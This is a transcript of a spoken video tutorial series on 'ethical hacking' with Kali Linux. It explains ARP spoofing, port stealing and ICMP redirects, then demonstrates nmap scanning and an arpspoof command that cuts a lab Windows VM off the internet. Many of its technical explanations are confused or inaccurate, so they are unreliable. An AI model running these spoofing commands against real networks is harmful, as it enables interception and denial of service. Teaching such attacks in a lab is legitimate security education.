that goes ahead and redirects these things. So ARP spoofing can be used to implement redundancy of network services. A backup server may use ARP spoofing to take over a server that has crashed and apparently transparently offer reduced redundancy. So these are the examples that an ARP spoofing is not only used for malicious purposes, it is also used for good purposes, but it depends upon the nature of the person as to how he sees that. So that would be it for this tutorial. In the next tutorial, I will be starting with the ICMP redirection, and finally the traffic tunneling and port stealing. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in this tutorial, we will be learning about port stealing and how it works exactly. So this attack exploits the vulnerability of switch devices in a LAN. It cannot be done on a wide area network because we would be using internet. But if you have already gained access to the network, then you can go ahead and use a remote computer to go ahead and do all of these stuff. So it consists in forcing a switch to update its forwarding table. To that, it will forward the packets sent to the victim on the port to which the attacker is connected. So I understand that this might be a bit confusing. So I'll just go ahead and simplify this out. But before I proceed, let me show you some important port numbers and let me tell you how exactly it will work. So I'll just go ahead and type important port numbers first. Now let me tell you what these things do exactly and how it works. Start. And by the time it starts, let me go ahead and open my notepad. I'll show you some important notes, and mine it is down, I believe. Let me check. Okay, perfect. So these are the important ports. 443 is the most important, and most of the time when you go ahead and try to hack into something, you will find all of these are except a few, like two or three things, two or three port numbers, everything else will be blocked. So this is the network time protocol. This needs to be active all the time because it gathers network information and the date and day and everything from the internet. After that, we have 443, which is the SSL protocol, and without this, you will not be able to access the internet. So the person whoever is managing this, should make sure that the firewall does allow incoming connections, but only restricted incoming connections. And then we have the 500, the important one, that is the inter-key exchange IPsec protocol, and which is quite important. So these are the important. So just think that if any of these things are compromised, then what may happen? Let's say, for example, if the network time protocol is open and we have this port access. So you can go ahead and modify the network changes, and trust me guys, any kind of changes to the days and date can go ahead and create a hell lot of difference in the system management and everything for an administrator, and that will not be good. After that, we have the HTTPS 443 port over here, and this is most of the time open, and hackers normally go ahead and use this port or the port 80, that is the HTTP, because it is not that secure. If the person knows how to go ahead and strip off the SSL, he will use the port 443, because even if the attacker is going ahead and using the port 443 to go ahead and hack into something and any outgoing traffic from that computer, the administrator will most of the time they go ahead and just ignore that part, because 443 usually goes through the secured strip line, and they won't even be able to know what exactly is going on, and they will think that since it is secure, it will be any part of the computer and not the attacker. So let's go ahead and start. Let me check if I could go ahead and run there. Let me check. Okay, so netstart does not work, or I'll have to run it through administrator, I believe. Perfect. Okay, and so just let this start. So as you can see, the last numbers are the port numbers as to where exactly it is going. So port numbers work in this way. I have taught this previously, but again I will go through them. So it works in this way. Like, for let's say, for example, you're ordering something through Amazon or any other website or eBay. Let's say, for example, then they will ask you to go ahead and input your address. So you will put address like something. Let's say, for example, America, and you will type California, and you will type West Edmonds Road, and now West Edmonds Road, and give me any random name. Let's say Cali Hill would be the name of the building, and finally the number 45 or 46, whatever the number would be. So Cali Hill, so what it is exactly is, this is the building or the locality where you live. This is your house's number, and this is the road, and this is the area and everything. Normally, we don't need the exact city or country, and so this is how it works. So how port limit work is that this will be ISP. After that, we have the you can say, as let's say, for example, let me just go down and cut it out, the internet, where exactly it is, and we have the ISP, internet service providers, and then we have the IP address, then we have the MAC address, and finally we have the port number. And actually we don't need the MAC ID because it would be the same. Perfect. So California is the internet from where exactly it comes, and then we have the West Edmonds Road, that is the area, that is the ISP, which area we are on exactly. The IP address would be the specific area where we reside. So IP address can be multiple people can have same IP addresses, and you may have heard that a person has same IP address, but trust me guys, multiple people do have the same IP address, but they the ending may be different, or the ISP may be different. That's the reason they to make it more simpler, let me tell that one internet service provider cannot have the same IP addresses, but multiple internet service providers can have same IP addresses. That is the best I can go through. So whenever you go ahead and send some data from your computer, and when it comes back to you, it will first check the internet connection, then the ISP provider to where it should go, that is the road, and it is same like the courier facility. Then it will check the IP address inside the ISP, that is your area, and finally it will go and check the port, that is the door, that is your only, and that cannot be different for any person, and only that thing will go through that port. This is how the port stuff works exactly. So normally the people, the administrator won't even go ahead and recognize that you are the one who is actually going and trying to steal something from them. So that's how it works. And now let me teach you how port stealing works exactly. So the attacker can receive the packets and read the contents once it has switched to update its forwarding table. And port stealing is a kind of attack where someone steals traffic that is
directed to another port of an Ethernet switch. So this attack allows someone to receive packets that were originally directed to another computer. It does so by making the switch believe that the attacker's port is a correct destination of the packet. To understand port stealing, you have first to understand how Ethernet or the Ethernet switches in particular work. First, there is a MAC address, which is a unique address for each and every computer that is connected to the Ethernet network and that is recorded in a network adapter. Ethernet frames have two MAC addresses stamped to it. One is the source address, which identifies the computer that sent the frame, and other one is the destination address, which is the address of the computer to which the frame has to be delivered. In the early days of Ethernet, like in the mid 90s, all frames were sent to everyone using a shared media such as coaxial cables, so everyone could listen to all the traffic. And this had several problems, security being the most important of them. Ethernet switches improved the situation by segmenting the network in such a way that every computer now has its dedicated port and only the person that wants that specific packet will be directed towards itself and no one else will receive that. So an Ethernet switch is able to learn who is connecting to the port and it does so by listening to the port traffic. As soon as your company sends an Ethernet frame, any frame, the switch looks at the source address and records it to a internal table. When it receives a frame that is destined for your computer, it sends the frame only for you. The computer in other ports don't receive the same port. And once you understand how it works up to this point, the port stealing attack becomes very easy to understand. An attacker is connected to, let's say, the another port. As you can see over here, this is the attacker's port and this is the original port. And as such, he's blocked from watching your traffic. So the attacker won't be able to watch you are doing exactly, continuing MAC address as the source address. So he will go ahead and impersonate your computer and the switch gets confused, which is actually the real one. The switch usually transfers the frame to the last port, which appeared to be the owner of that MAC address. And if the attacker is sending lot of frames, he's going to receive your frame in place. So let's say for example the MAC ID. Let's say for example, I'll take a random. I will not even name it a specific MAC ID. To make it more simpler, I'll just tell that. Let's say for example the MAC ID of this computer is A, and for this computer is B. So what it will go do is that it will go ahead and spoof its MAC ID to A, and then it will go ahead and DDoS this machine. That's denial of service attack to this machine or distributed denial of service attack, so that it will go down and it won't be able to go ahead and connect to this computer, the original hub or the switch. And later on when the switch sees multiple addresses stating that it will see that there are multiple addresses, the MAC address of both, but it will not be able to go ahead and it will be confused to which it should send to. So it will go ahead and send it to the last used port, which is this actually. But it will not be able to send that, the reason being that the port is already blocked by the DDoS attack. So then it will be forced to go ahead and send that a packet to this computer and then he will go ahead and impersonate that computer and he will have all the information. So the switch usually transfers the frame to the last port which appeared to be the owner of that MAC address. And what happens next on this depends on the attacker's intention. He may receive your packet and keep it for himself, but he can also send the packet back a few moments later so you receive it with a little bit of delay and you have no way to tell that it was compromised. So port stealing rely on the fact that the switch needs to update its address table dynamically because real networks are not completely static. For example, if you move your computer from one port to other, you would expect the traffic to be sent to the new port instead of the old one. However, there are some more advanced configuration that you can apply to a switch in order to make this kind of attack harder to do. These features are typically of the more expensive enterprise grade, and switches are not found in the less expensive small business equipment. It's typically found in the most companies and homes, which makes these environment more vulnerable. But at the same time, this isn't a very useful attack for all small networks because it involves a lot of work to do and to capture a small amount of traffic as well. So that's how the port stealing actually works in reality, and using it is quite easy rather than just going ahead and knowing how it works. So once you know how it works exactly, it will be far easier for you to go ahead and implement that. So that is it for this tutorial. In the next tutorial, I'll be teaching you about the most important ICMP redirection and finally the traffic tunneling. And once you have all the basics right, it will be easier for you to understand how the ICMP actually works and why it is very, very bad. So that's it for this tutorial, guys. See you in the next tutorial.
Hello guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorials, we had a look at DHCP spoofing, poisoning, DNS poisoning, and ARP poisoning. But there is one more term before you could get rid of the MITM attacks, and that is ICMP redirection. And this is quite different from all the other attacks. The reason being that, okay, I'll tell you later on that. And by the end of this tutorial, you will be having sufficient knowledge for going ahead and doing all the MITM attacks out there and how to prevent yourself from them as well, unless you don't fall prey to social engineering. And yes, and the last thing that I would be teaching you by the end of this tutorial would be how you could go ahead, and I would actually practically like to show you a few examples of how we could go ahead and use Ethernet or EtherCap to go ahead and actually capture some packets and get data out of them by stripping off SSL security or sniffing and spoofing and going ahead and gathering information over the MITM network and becoming a man in the middle. And yeah, that's right. So first, let's start with the ICMP redirection. So an ICMP redirection is an error message sent by a router to the sender of the IP packets. So redirects are used when a router believes a packet is being routed, you can say as suboptimally, and it would like to inform the sending host that it should forward subsequent packets to the same destination through a different gateway, because that gateway is not able to perform in a good or sufficient data analysis, due to which it is not able to send the proper packets in the same direction. That's why it will ask you to go ahead and send it through a different gateway. So in theory, a host with multiple gateways could have one default route and learn more about optimal specific routes over time by the way of ICMP redirect. So let's consider the following diagram. This diagram, simple. So in this figure, you can see that host A over here, it wishes to send a packet to the host B. The routing table on the host A consists of a default route through router R1, that is, which is one over here. And when R1 receives a packet destined for host B, it looks at its routing table and notices that it has a route not default to R2, that's router 2 for packets, but that is destined for host B. So therefore, it forwards the datagram to R2, which in turn passes it along to the host B. Router 1 also notices that the outgoing interface and network for the packets was the same as the interface it arrived on. Since it is configured to send ICMP redirect, it sends an error message to the host A informing it that all packets destined for host B should be forwarded to R2 and not to R1, or else it will not be able to go ahead and communicate with the actual Ethernet part. So it makes sense for router 1 to send a redirect because host A could have just as easily sent packets through R2 to start with. Sending packets through R2 directly would decrease the number of routing hops for host A and increase the performance on R1's link. Obviously, redirects would not be involved if host A contained a static route to R2 for packets to host B, or if R1 could forward packets to host B through a better path such as directly connected interface. So if this was directly connected, or if it would somehow go ahead and pass all the data to router 2, then it would be sufficient. But since it cannot, it will straight away go ahead and give an error message to A that it is not able to go ahead and send the packets to actual connection B, because for the router A, it does not even belong over there. Means it will not even recognize whether there is a host B. It will only think that there is host A, the reason being that it is only connected to A, that's why. So it will go ahead and send an error message, but the computer host A will not stop looking for the correct path. It will go ahead and try to send it to the router 2, that's R2 over here, and then it will be able to connect to B. So there are different ways of connecting. However, there are different rules for the route, and there are several that govern the rules of ICMP redirects and their acceptance into a host routing table. Before an ICMP redirect is generated, there are following restrictions that are typically adhered to on most of the today's routers. The first thing is that the outgoing and the incoming interface of the packet must be the same. If they are not the same, that means somehow they were disauthenticated in between, and either part A or either the host A or host B will not accept it back again, and it will just go ahead and dissolve in the whole network when the data network transfer starts again. The IP source address in the packet, that is the second one. The IP source packet the IP source address in the packet is on the same logical IP network as the next hop IP address is. To be more specific, if it tries to go, if there is no connection between them and the IP address source is different, because for example, let's say it's 192.168.1.01 and over here it's 192, or you can say it's 172.1.1.1, something like that, anything random, but it is different from the source of over here A, then it will again not be able to collect. The reason being that there won't be any connection in within the LAN network if both the IP addresses have a total different configuration. The third thing is that the route used for the outgoing packet must not be an ICMP redirect or a default route. To clarify it a bit more, let's say A has transferred let's say 8 MB packet to part 8 KB packet to router A. So this is the default way or the gateway for the host A. This is the default router, that is the gateway. So but at the same point, this is also the ICMP redirect path for host A, because when it transferred to go ahead and when it tried to go ahead and transfer some data to host B, it redirected it back to A, stating that there was no such connection as B. So to make sure that you have a connection with host B, there should not one should not be either the default or one should not be either the redirect gateway, because if both are the same, then it again won't be able to connect. But if one is the default gateway and it is ICMP redirect, then this should be the default route, else it won't be able to connect. Or if this is the ICMP redirect, then this should be the default gateway, else it won't be able to reconnect. The fourth part would be the packet data does not contain an IP source route option. So that means that if this has any random IP address, then the packet that is being sent should not have a gateway or let's say an IP address configured by a different gateway. The reason being that if they are on the same LAN and they have different gateways and different IP addresses, again they won't be able to reconnect. They should have either the same gateway or a same type of IP addresses in the same similar manner, or else it won't be able to reconnect. And the fifth and the foremost important part would be the gateway must be configured to send redirects, so that if router 1 is not configured to go ahead and send any redirects, then A will keep on trying to go ahead and connect to B. It will not even redirect any traffic back to A, so it will still keep thinking, or it will still keep looping the same thing again and again, and it won't even be able to sense that it was not able to connect to B, because the router 1 will never tell A that there is no connection B. It will just go ahead and consume all the data bandwidth in between. It will get destroyed, and it will just be like a black hole. You're just trying to send something, but you're not receiving anything back, and you won't even know what is happening over there. That's how it works. But if this is configured to go ahead and redirect it back to A or to router 2, then it will straight away go ahead and redirect to either of those, and then it will be able to send the packets. So RFC 112 of 2, that is the, you can say a section something like that. It states that the host should not send ICMP redirect. If A is able to redirect an ICMP, let's say for example, if A has sent some packets to 1, it should not be able to redirect the same packet to the router 2, else it will not be able to send, the router 2 will not be able to send it to host B, because router 1 has already went ahead and denied that. That's the reason. So whenever it receives a redirect from the router 1, the A should go ahead and particularly deny or destroy the data and resend a new packet with the same data to the router 2. Else again, it won't be able to reconnect after that. So there are specific kind of particular routing table that one needs to know properly before they go ahead and actually connect to the ICMP redirection. And multiple other, you can say, as checks that are typically performed at the host, and they're not all mentioned in the RFC 112. And just if you're wondering what RFC 112 is, I'll just go ahead and show that to you before I close this tutorial. So I can just type, I'll just go ahead and connect to my website. Yeah, perfect. Okay, after surpassing my gateway, I'll just go to RFC 112. As you can see, RFC 1122, that's requirement for internet host communication layers. They have set up different types of walkthrough through which we have to go ahead and configure each and every protocol. If they don't, you can say as don't satisfy that, then they won't be able to reconnect, or they won't even be able to go ahead and actually surpass anything along. So that's it for this tutorial, and in the next tutorial I'll be teaching you the different ways of connecting and what are the different checks that must be performed, but they're not listed in RFC 1122 before adding a redirect route to the routing table. So that's it for this tutorial, guys. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, we saw a look at ICMP redirection, and RFC 1122 states that the host should not send ICMP redirects, and however, just as the default gateways follow a set of guidelines as to whether they will send redirects or host also have a built-in specific set of guidelines of protections to prevent inadvertent additions to the routing. So I'll now teach you about the following checks that are typically performed at the host. Not all of them which are listed at RFC 1122 before adding a redirect route to the routing table. So the first point would be the new router must be reachable through a directly connected network. So if this router is connected through some other router, that's some other computer, and it finally goes and reaches back to A, it won't work because it should be connected directly to the computer A, else it will not. The new router must be from the existing router for the destination in question. So to simplify it, let's assume that router A is our main router, and this is a remote computer, and this is our original computer. If I send a packet to that remote computer, and that sends a packet to the router will not be able to redirect it back to A. The reason being that this specific computer, that is let's say a remote computer, it only accepts connections and data from A, whereas it only sends out packets to this specific router. It will not go ahead and accept anything back to A. So in order for the router to go ahead and connect back to A, it should be connected directly, not remotely. The third point would be the new route cannot specify the host as the next hop address. So let's consider something as, let's say for example, A has directed a packet to the router 1, and 1 cannot go ahead and redirect the packet to B through A or through the router. Means no, it can do through the router, but it cannot go ahead and send it to the same host to connect it back to B, because B will not be able to then recognize whether it was sent by A or 1, and it will be again in the loop as to from where it was sent in total. So that it should be connected either such as A, 1, 2 and B, or A, 1, A, end, and a new packet should be sent to the router 2. And yeah, that's how it will work. And the fourth point would be the redirect route must not point to an address on the local subnet. And the last point would be the host must be configured to accept redirects, because if A is not configured to accept redirects, and if the one goes ahead and passes the redirect, A will think of something like something is trying to pass the data along through A, and again it will go ahead and redirect it back to B, and again the loop will start and nothing will happen again. So in practice, some operating systems perform more security checks than others when adding redirect routes. So Windows is good in redirecting, but I would not say that it is very awesome or something like that. Even Ubuntu is good at that, but the best one feature which I would like to tell you would be from the Fedora and the Red Hat, because they are very much awesome in going ahead and configuring redirects, because they are made for that specific purpose, for being used by system administrator to know where each hop is connected, where each host is there, and where each route is there, which router is going ahead and redirecting all the parts, and they need to make sure that one is not redirecting the part back to some third party over here, which is a malicious attacker again. So now let's talk about the raw data. So the ICMP redirect error message is consistent with the format of all other ICMP error messages. So this is a breakdown of what the ICMP redirect packets look like. This will not give you much of an idea as to how exactly it should be, but this is how it would look like. The redirect message contains an ICMP type of 5 and a code between 0 and 3, that is from over here, 0 and from 3, that is where the code lies in between. The next comes the checksum and the IP address of the next hop router that should be used. Finally, the IP header and the first 8 bytes of the offending packets are included as a part of the ICMP data. And by offending packets, I mean the packets that were redirected back to A and not the original packet. Because once the packet is sent back to A, so I'll just go ahead and show it out to you. So once the packet is sent out from A, that is not the offending packets, but when it is sent out from one back to A, they are the offending packets. And this code field will allow the following types of redirect messages to be sent. So this is how it looks like. Notice that there's no place in the packet to delineate or a network mask. In practice, only codes 1 and 3 are usable. I'll just go back to the previous one. Only codes 1 and 3 are usable because a host cannot accurately guess the network mask in which the destination fails. Network redirects were designed in the days of classful routing when masks were implied. But very few networks are still deployed this way today. Based on the information purpose so far presented, it would seem that ICMP redirects serve quite a useful purpose. In fact, they do. Yet there are several reasons to steer clear from redirects, all of them relating to network performance, consistency, reliability, and security. And as you can see, 0 is the redirect datagram from the network, redirect datagrams from the host, that is 1, 0, 1, 2, and 3. The second one is the redirect datagram for type of service and network, and the third one is the redirect datagrams for the type of service and the host. So networks that qualify for ICMP redirects are inefficient. This inefficiency stems for several reasons. Firstly, packets that enter and exit the same interface and IP network towards their final destination are taking a suboptimal routing path. These packets should be forwarded through a different gateway in order to reduce the number of routing hops and in turn decrease latency and increase network throughput. Packets that enter and exit the same interface of the router are effectively doubling the load on that link. Secondly, as we noted earlier, ICMP redirects are not only host based because it is not possible for a host to guess for which networks a packet is being suboptimally routed to. So just consider this following program over here. Once again, host A would like to send a packet to B. The routing table on host A consists of only one default gateway and no other static rules. And this is the routing table from output from host A, that is a FreeBSD 4.6 system. And if you don't know what FreeBSD is, I'll just go ahead and show it out to you. It is mostly used for creating a firewall, and it has its own brother known as OpenBSD. I'll just go ahead and show it out to you, the operating system. So as you can see, here are the latest releases. You can just go ahead and click on that link and download all the parts that you need. And FreeBSD is an advanced computer operating system used to power modern servers, desktop, and embedded platforms. And this is quite a good and secure operating system, I can say that. And yes, you are right, you heard it right. It's an operating system. And it is not like the Linux or Unix that you would use. I'll just go ahead and show out an image to you as to how it looks like. Yeah, this is how it looks like. And yes, this is how it looks like in actuality. Just ignore this part. So this is how it looks like in actuality. You have Wine over here that can go ahead and run Wine programs. You have the pig, the snort, the buffalo that can go ahead and run multiple programs out there, even the Mac programs. And finally, you have Mozilla to safely go ahead and browse or go through whichever things that you need. And it's mostly used to go ahead and create, you can say as, let's say, for example, to go ahead and secure or create a firewall so that everything that comes in and goes out will be seen by FreeBSD, and it will keep logs for you to go ahead and understand how exactly or who exactly went through the records and how it will work exactly. Go ahead and start. Okay, so coming back to our tutorial, I'll just go ahead and show you one more thing. To see if host B is alive, host A sends two ICMP echo requests to host B as follows. And notice that host, as you can see over here, when you go ahead and ping it, notice that host A did receive an echo reply from host B. As you can see over here, packets were being sent out and it redirected host and was sent out back to A as well. So, but it also received, notice that A did receive an echo reply from host B, but it also received something it may not have bargained for, that is, one ICMP redirect for every packet destined to host B. This would have continued indefinitely until host A cancelled its ping, as we have done above. As you can see, I have gone ahead and cancelled the request, else it will still continue, and this arrow C, upper arrow C means that I have gone ahead and cancelled that. So, Even though host A received an ICMP redirect for every packet, you may think that why did not it take a new path right away? If we examine the routing table on host A once again, you notice that a host-based route was indeed installed for the IP address 10.0.1.32. I'll just go ahead and go back to my previous and previous. So this one, it was already configured to go ahead and route it back to A, but it did not go ahead and actually redirect anything. So it would appear as if the ping program does not re-evaluate the routing table during runtime. The reason for this is explained quite elegantly by a guy named as Richard Stevens, who points out that this happens because there is no control input function for the raw IP protocol. It's only there for UDP and TCP. Since ICMP lies just above the IP layer, the redirects appear to be ignored. Thus, changes in the routing table are not taken into account until we stop and rerun the program like I have done so over here. Okay, so that's how it looks like in reality, and we need to go ahead and cancel that one again, but I won't be explaining this to you in this tutorial. In the next tutorial, I'll be continuing the same part, so make sure that you have watched this tutorial first and only then you go on to the next tutorial, guys. Hey guys, welcome to the next tutorial of ethical hacking and pen testing with our own operating system, Kali Linux. So in the previous tutorial, I taught you about the ICMP redirection, and just before I proceed, I'd like to give you I'll go through a short discussion of my previous okay, so over here it would appear as if the ping program does not reevaluate the routing table during runtime. The reason for this is explained quite elegantly by Richard Stevens, as I told you previously, that this function only works for raw IP protocol, that is UDP and TCP. So this time our packets have taken their expected path and travel immediately through R2 rather than first traversing the default gateway R1. For every destination that host A receives a redirect, it will install a redirect host based route in its routing table. In this small example, it would potentially install up or set up to 255 routes and 32-bit mask. Just consider how many potential host based routes this could generate for networks with more inclusive prefixes. For example, a single route with class B mask potentially add up to 65,535 redirects. Certainly, it would be better for host A to be fitted with some better method of discovering what traffic to send through R2 instead of relying on ICMP redirects, because actually going ahead and redirecting 65,535 redirects, it sounds exhausting, and it is exhausting. Because if you go ahead and try to do that, you may not even be able to get the redirect, stating that you will just be in a loop and you'll waiting like forever to go ahead and get the redirect. Thus, depending upon the OS implementation, these host-based routes can have the characteristic of being short-lived. Solaris implements aggressive aging, where Solaris operating system, it implements aggressive aging where redirects will only last for a specified amount of time. So let's say, for example, if I have redirected something to A and it does not respond for, let's say, around 10 seconds, 20 or 30, whatever the time may be, then the timer will expire and it will not be able to go ahead and send anything back. Each redirect is given a short lifetime value and will be automatically removed from the routing table when the timer expires. This is to ensure that redirects do not remain in the routing table indefinitely, at the risk of further going ahead and freezing other data as well. So in BSD networking code, redirects will be removed if they are being used by TCP, and only after the fourth consecutive retransmission attempt they will be removed. Router and gated perform similar forms of redirect expiration. Since ICMP redirects are dynamic and may not reflect the most current topology, it is nice to have an automated method of redirect expiration. Note that ICMP redirects can also cause problems in firewall environments where flow traffic patterns are non-deterministic. Just consider this following example. Figure 3 looks like, okay, just let me check. So over here, this figure looks quite similar to the previous diagrams, but suppose that host A's default gateway is not a firewall, that is, it is now a firewall instead of a router. If host A were to receive an ICMP redirect from its default gateway, probably only part of the traffic flow from host A to host B would be seen by the firewall. Asynchronous flows pose particular problems for stateful firewalls because they need to see the entire flow cycle. This is especially the case for TCP traffic when individual packets can point to state transmission such as a beginning, such as SYN or SYN-ACK, the middle such as the ACK PSH, or the end such as fin ACK RST. If the firewall were only to see the beginning of the flow or part of it, it may take an extra long time to time out entries from the session table because it was not able to see the middle and the end of each flow, and again it may again go over and get disconnected. The problem is exacerbated if an ICMP redirect only gets acknowledged by a host after the initial TCP handshake has completed. Firewalls rely on timeouts to age out old entries in cases where TCP control traffic is not available. Although embryonic TCP connection timeouts are generally an order of magnitude smaller than timeouts for established TCP connections, they can still lead to firewall session entry table converting into exhaustion. So a common design flow is that firewall security in this topology could be bypassed altogether if host A were to simply create a static route to host B instead of using its default gateway. This is probably not what the network architect intended when placing a firewall in front of the host A if she or he was looking to filter the traffic properly from host A to host B. So in short, what I'm trying to say is that whenever some data has been sent out, the host A should know whether it should use the default gateway through a firewall or a blocked router, or it should know that it should go through the port 2, that is router 2, through which it should be able to connect to B. So the person needs to know, the data needs to know where it is actually going through. Finally, redirects could be used by an attacker that has some knowledge of the network topology to inject malicious routes into the host routing table. This could case a denial of service against the host or specific destination it is trying to reach. One example of such a program would be ICGen. I'll go ahead and talk about that at the later part of this tutorial. It is a utility developed by an author simply for research that is capable of sending any type of ICMP unreachable message. Older Microsoft variants are much more susceptible to this form of attack since less security precautions are out in place. And newer operating systems make this more difficult to spoof, but not altogether impossible though. But there is still a good news. Fortunately, there are effective tactics when dealing with networks that wish to send ICMP redirect, aside from disabling them altogether, because disabling them will not just go and help us, right? That's why. So generally, these types of network can be re-architected through one of the following means. A. Changing the network configuration to remove the possibility of multiple non-redundant gateways for a host. B. Changing the network configuration to make the gateways redundant. C. Adding optimum static routes to the host for the networks in question. And the last and the foremost important, adding the capability for learning dynamic routes to a host. So, and the last and the foremost part would be, not the foremost, the ultimate thing that you would like to do in your environment would be to go ahead and make the host intelligent enough to understand whether it should go ahead and pass through a firewall or it should go through any other gateway through which it could go in and get access or give access to host B. And the firewall should be good enough to understand whether it should go ahead and force feed the data to go ahead and cancel itself if it's going to go through another gateway, or it should go ahead and allow it quickly just by going ahead and scanning it from the start to middle as well as the end, and knowing how to go ahead and redirect that. So though ICMP redirects serve to point out issues with suboptimal routing, network re-architecturing should be favored over their use. Well-designed networks should never lend themselves to the reliance on or desire for ICMP redirects for reasons of performance, consistency, reliability, and security. ICMP redirects are bad, that's why. So in short, that you should make your network so good that you should be able to know whether it should be able to, or in fact you should never be able to, you should not go ahead and disable ICMP redirection, I'm saying. But what I am trying to convey is that you should be able to know whether you should be able to go ahead and transfer data through different routes and through different gateways, and even if let's say for example, if the host A transfers some packets to, let's say let's assume that this firewall is a router. I'll just go ahead and go back to my previous one. So let's say for example, if the host A tries to send something to host to the router A, and as soon as it gets the redirect, it should go ahead and quickly pass it through router B rather than going ahead and searching default gateways. So there should be specific gateways set up already before anything goes further on, so that you know exactly what is happening and it should know exactly from where it is going. And the final thing that I'd like to convey to you would be avoid traffic jams, try quantum tunneling. It is the most famous quote of all time. I don't know who said it exactly, but this is very famous. So quantum tunneling, to be in technical terms, I can say as using a secure layer. It is going ahead and using there's a most famous application which is used that is called as Putty, P-U-T-T-Y, and you can go ahead and download it from over here. Let me just show it out to you. So as you can see, this is a free SSH and Telnet client for Windows. And Ubuntu, Kali Linux, they have all inbuilt SSH clients, so you don't need to worry about that. For Windows, you can go ahead and use this, and this is a very, or I can say extremely secure Telnet client used by most of the people out there. You can go ahead and connect to any Windows you want through the SSH tunnel, and you won't even face any kind of traffic jams because it's quite or extremely fast. And you can run multiple computers, whereas using graphic user interface can go ahead and run only one computer. Yes, so that is it for this tutorial, guys. In the next tutorial, I will actually be going ahead and showing you some actual examples of going ahead and killing your network, or using some tactics to go ahead and defend your own network, as well as using your exploits and injecting them into softwares. And at that point of time, we will be using ItterCap, which is again used for man-in-the-middle attacks.
Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorials, we have taken a look at how we can go ahead and use ICMP redirections and ARP poisoning to our own, let's say for example, uses. So there are multiple features out there. You can go ahead and search related to that, such as web. So the first thing that we would be teaching right now would be how we could go ahead and first kill our, or let's say for example there is any I will be teaching you the man-in-the-middle attacks today, so that we would be first taking a look at how we can go ahead and kill the router or the modem a bit in between us if you're using Wi-Fi, or if you're on a LAN connection. How can you go ahead and let's say for example spoof or use another person's network to your own advantage. So for these tutorials I will be assuming that you already have gone ahead and gained access to the router. By looking at one of my previous tutorials, you can go ahead and check how we can go ahead and gain access to any machine by going ahead and using some of the exploits in Kali Linux. So in this tutorial I will be teaching you the post exploitation method. So let's go ahead and start our Windows 7 virtual machine as well as the Kali Linux. Let it start. So just in case if you're not using Kali Linux for some reason, you have your own Ubuntu or Fedora which you have customized extremely, or even a BSD server, then I will show you where you can go ahead and download the ItterCap which I would be teaching you today. And you can go and download the ItterCap from over here, just in case you're using any other versions of Linux such as Ubuntu or Red Hat or any other thing. So you can just go ahead and add this repository from the GIT hub, and it will be much easier for you to go ahead and spoof or sniff anyone's IP address, or go ahead and gather any information. And another one which I would be recommending would be the Wireshark. And Wireshark is a very awesome tool. It's also available on Android if you can go ahead and check, but it is a, so I'll just go ahead and show you the Android versions as well. This is not Wireshark. Wireshark is a bit different, and it is called as Interceptor NG over here, which performs the same as Wireshark. As you can see, we have this over here. So it performs the same thing as Wireshark, that is going ahead and gathering TCP details and dumping it over in a local format. So yep, now let's go ahead and start our Kali Linux. And Windows 7 as well. Perfect. So I'll just maximize this. I'll open the terminal. And the first thing that I would like to check is that whether I would like to show you, you should make sure that these both are in a NAT format, that is both are able to access the internet as well as each other. So for that, first go ahead and check whether they are on the same gateway or something. So just go and type CMD and hit enter. And you can type ipconfig over here to go ahead and check. Okay, so the default gateway is 192.168.236.2, and this is my IP address. And let's check whether the gateway for this is the same.
Okay, I believe it is saying the reason being that I cannot see the gateway over here, but I can surely see the IP address is 192.168.236.130, and over here it's 236.131. So I believe only the last part is different. So I believe they are both on the same gateway. So now let's go ahead and let's see if my Windows 7 version is able to access internet. Let's see. Okay, perfect. I believe we have access to the internet right now. Perfect. So I'll just go ahead and let me just check. So once you have gone ahead, you must be already knowing that this is the victim's IP address, since you have already gone ahead and hacked into the system. But now you want to go ahead and capture the data from their system and gather much more information. So I would be assuming for this tutorial that we have access to this machine, and since we are in LAN, we already know where we are exactly, because I can straight away go ahead and use my nmap. I believe it's SP, I believe, or SP, or SS, I believe it's SS 192.168.236.2 to 154, and let's check. If I remember properly, then it should be this. What this would do, okay, I believe it's SP or SSI, I don't remember exactly. I believe it's SP. Fact. Okay, perfect. It's SP. So as you can see, nmap scan for report 192.168. It's from. So what this is exactly doing is it's capturing all the connections that are available on my router right now. So as you can see, I have this VMware version as it's showing 192.168.236.30 and 0.131, which is mine, and this is the default gateway router. All of these three are up. That means all of these are working right now. So I would first go ahead and try to, let's say for example, if this was on a wireless LAN, then I could straight away go ahead and type ARP spoof -I space WLAN 0 and -T. And now I would go ahead and type the router's address. So over here it's 192 and 0.168.236.2, and I will just go ahead and show you what this I and T means. Let me just open the ARP spoof. I is the interface, so over here it's WLAN if this was a wireless network, and T, as you can see, is the target. But since we are not using the WLAN 0, we have something different over here. It's working on ETH 0, so I would be using the ETH 0 rather than WLAN 0. Perfect. And over here the target, okay, this is not my target actually, and it's 192.168.236.2, and I would be going ahead and typing now the victim's IP address, not my IP address, so just make sure of that. It's 192.168.236.13, I believe it was 0. Perfect. And now let's see if our party is able to access the internet. If I have not done anything wrong, then I should not be able to. Let's check. Okay, I'm still able to. Okay, I believe, that was wrong. Sorry. I actually went ahead and used my own IP address. My bad. So I'll just go ahead and cancel that, and I'll change it to 131. That is my victim's IP address, I believe. That's what happens. You go ahead and do a lot of things, but finally just miss out the small things, and a small error will lead to huge mistakes. Now let's see if our person is able to access the Windows. I believe not, because even the Chrome is not starting. So let's go ahead and check Google. Perfect. So now our attacker will not be able to go ahead and able to access anything over here. And just in case, if you wanted to check which the person has what kind of computer or something, you could go ahead and use let's say for example the nmap or the zenmap to go ahead and gather more information. Or if you're more interested in the hardware, then I could still do that. So as for the timing, I'll just cancel this ARP spoof right now by typing Ctrl-Z. And as I was using that, let's go ahead and check what is the MAC ID of our target. So this is the MAC ID of our target, that's 131, and this is my own, which I mistakenly took for our target's ID. So I'll go ahead and use this IP address. I'll just go ahead and copy it over from over here, and I'll be using that to go ahead and insert it over here. So I'll just type HTTP. Okay, I don't even need that, I believe. It's MAC, I'll just type it over here, MAC ID checker, and I'll get admin user, something like that. Yeah, perfect. So as you can see, I have the admin sub.net. If I go and type it over here, since I'm using VMware over here right now, it would show me VMware.
